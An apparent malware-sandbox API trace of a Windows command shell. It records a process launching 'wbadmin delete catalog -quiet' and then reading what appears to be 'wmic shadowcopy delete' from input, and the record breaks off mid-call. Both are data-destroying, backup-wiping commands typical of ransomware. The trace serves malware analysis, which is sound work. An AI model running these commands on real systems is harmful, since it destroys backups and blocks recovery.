(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.416] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.417] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.417] GetProcessHeap () returned 0x3e0000 [0114.417] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4640 | out: hHeap=0x3e0000) returned 1 [0114.417] GetProcessHeap () returned 0x3e0000 [0114.417] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f8900 [0114.417] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cee30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cede0 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x2cede0*(hProcess=0x50, hThread=0x54, dwProcessId=0xb64, dwThreadId=0xbc8)) returned 1 [0114.725] CloseHandle (hObject=0x54) returned 1 [0114.725] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.726] GetProcessHeap () returned 0x3e0000 [0114.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0114.726] GetEnvironmentStringsW () returned 0x3f8980* [0114.726] GetProcessHeap () returned 0x3e0000 [0114.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0114.726] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0114.726] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x2ce6e8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2ce6e8, ReturnLength=0x0) returned 0x0 [0114.726] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdb000, lpBuffer=0x2ce720, nSize=0x380, lpNumberOfBytesRead=0x2ce6e0 | out: lpBuffer=0x2ce720*, lpNumberOfBytesRead=0x2ce6e0*=0x380) returned 1 [0114.726] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0115.972] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ced28 | out: lpExitCode=0x2ced28*=0x0) returned 1 [0115.972] CloseHandle (hObject=0x50) returned 1 [0115.972] _vsnwprintf (in: _Buffer=0x2cef98, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced38 | out: _Buffer="00000000") returned 8 [0115.972] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0115.972] GetProcessHeap () returned 0x3e0000 [0115.972] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0115.972] GetEnvironmentStringsW () returned 0x3f8980* [0115.972] GetProcessHeap () returned 0x3e0000 [0115.972] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0115.972] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0115.972] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0115.972] GetProcessHeap () returned 0x3e0000 [0115.972] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0115.973] GetEnvironmentStringsW () returned 0x3f8980* [0115.973] GetProcessHeap () returned 0x3e0000 [0115.973] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0115.973] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0115.973] GetProcessHeap () returned 0x3e0000 [0115.973] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8900 | out: hHeap=0x3e0000) returned 1 [0115.973] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cedf8 | out: lpAttributeList=0x2cedf8) [0115.973] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0115.974] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.974] SetConsoleMode (hConsoleHandle=0x10c, dwMode=0x0) returned 0 [0115.974] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.974] GetConsoleMode (in: hConsoleHandle=0x10c, lpMode=0x49f5e194 | out: lpMode=0x49f5e194) returned 0 [0115.974] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.974] GetConsoleMode (in: hConsoleHandle=0xa4, lpMode=0x49f5e198 | out: lpMode=0x49f5e198) returned 0 [0115.974] GetConsoleOutputCP () returned 0x1b5 [0115.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0115.974] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b70 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9910 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1cd0 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fba10 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9f20 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1ab0 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3faa40 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4610 | out: hHeap=0x3e0000) returned 1 [0115.975] GetProcessHeap () returned 0x3e0000 [0115.975] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f97e0 | out: hHeap=0x3e0000) returned 1 [0115.975] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf258 | out: _Buffer="\r\n") returned 2 [0115.975] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.975] GetFileType (hFile=0x10c) returned 0x3 [0115.976] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.976] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0115.976] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf228, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf228*=0x2, lpOverlapped=0x0) returned 1 [0115.976] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0115.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0115.976] _vsnwprintf (in: _Buffer=0x49f5eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf268 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0115.976] _vsnwprintf (in: _Buffer=0x49f5ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf268 | out: _Buffer=">") returned 1 [0115.976] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.976] GetFileType (hFile=0x10c) returned 0x3 [0115.976] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.976] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0115.976] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf258, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf258*=0x26, lpOverlapped=0x0) returned 1 [0115.976] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.976] GetFileType (hFile=0xa4) returned 0x3 [0115.976] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.977] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.977] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e320, cchWideChar=1 | out: lpWideCharStr="wbadmin delete catalog -quiet\nquiet\n") returned 1 [0115.977] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.977] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.977] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e322, cchWideChar=1 | out: lpWideCharStr="madmin delete catalog -quiet\nquiet\n") returned 1 [0115.977] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.977] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.977] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e324, cchWideChar=1 | out: lpWideCharStr="idmin delete catalog -quiet\nquiet\n") returned 1 [0115.977] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.977] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.977] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e326, cchWideChar=1 | out: lpWideCharStr="cmin delete catalog -quiet\nquiet\n") returned 1 [0115.977] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.977] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.977] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.977] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e328, cchWideChar=1 | out: lpWideCharStr=" in delete catalog -quiet\nquiet\n") returned 1 [0115.978] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.978] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.978] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32a, cchWideChar=1 | out: lpWideCharStr="sn delete catalog -quiet\nquiet\n") returned 1 [0115.978] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.978] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.978] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32c, cchWideChar=1 | out: lpWideCharStr="h delete catalog -quiet\nquiet\n") returned 1 [0115.978] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.978] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.978] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32e, cchWideChar=1 | out: lpWideCharStr="adelete catalog -quiet\nquiet\n") returned 1 [0115.978] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.978] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.978] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.978] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e330, cchWideChar=1 | out: lpWideCharStr="delete catalog -quiet\nquiet\n") returned 1 [0115.978] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.978] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.978] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e332, cchWideChar=1 | out: lpWideCharStr="olete catalog -quiet\nquiet\n") returned 1 [0115.979] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.979] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.979] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e334, cchWideChar=1 | out: lpWideCharStr="wete catalog -quiet\nquiet\n") returned 1 [0115.979] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.979] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.979] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e336, cchWideChar=1 | out: lpWideCharStr="cte catalog -quiet\nquiet\n") returned 1 [0115.979] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.979] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.979] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e338, cchWideChar=1 | out: lpWideCharStr="oe catalog -quiet\nquiet\n") returned 1 [0115.979] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.979] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.979] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33a, cchWideChar=1 | out: lpWideCharStr="p catalog -quiet\nquiet\n") returned 1 [0115.979] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.979] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.980] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33c, cchWideChar=1 | out: lpWideCharStr="ycatalog -quiet\nquiet\n") returned 1 [0115.980] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.980] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.980] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e33e, cchWideChar=1 | out: lpWideCharStr=" atalog -quiet\nquiet\n") returned 1 [0115.981] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.981] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.981] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e340, cchWideChar=1 | out: lpWideCharStr="dtalog -quiet\nquiet\n") returned 1 [0115.981] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.981] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.981] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e342, cchWideChar=1 | out: lpWideCharStr="ealog -quiet\nquiet\n") returned 1 [0115.981] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.981] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.981] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e344, cchWideChar=1 | out: lpWideCharStr="llog -quiet\nquiet\n") returned 1 [0115.982] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.982] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.982] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e346, cchWideChar=1 | out: lpWideCharStr="eog -quiet\nquiet\n") returned 1 [0115.982] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.982] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.982] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e348, cchWideChar=1 | out: lpWideCharStr="tg -quiet\nquiet\n") returned 1 [0115.982] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.982] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.982] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34a, cchWideChar=1 | out: lpWideCharStr="e -quiet\nquiet\n") returned 1 [0115.982] _get_osfhandle 